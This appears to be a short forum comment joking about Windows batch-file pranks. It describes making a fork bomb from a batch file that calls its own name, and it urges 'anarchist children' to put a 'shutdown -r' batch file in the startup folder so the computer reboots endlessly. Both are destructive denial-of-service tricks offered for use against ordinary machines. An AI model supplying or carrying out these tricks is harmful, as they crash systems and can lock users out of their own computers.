if you also add the name of the file inside a file - then you get a real fork bomb :D

for example if the file is named forkbomb.bat

whatever you do don't put it in the startup folder :P

For the anarchist children out there who really wanna have fun put the following in a batch file

shutdown -r

now put that batch file in your startup directory
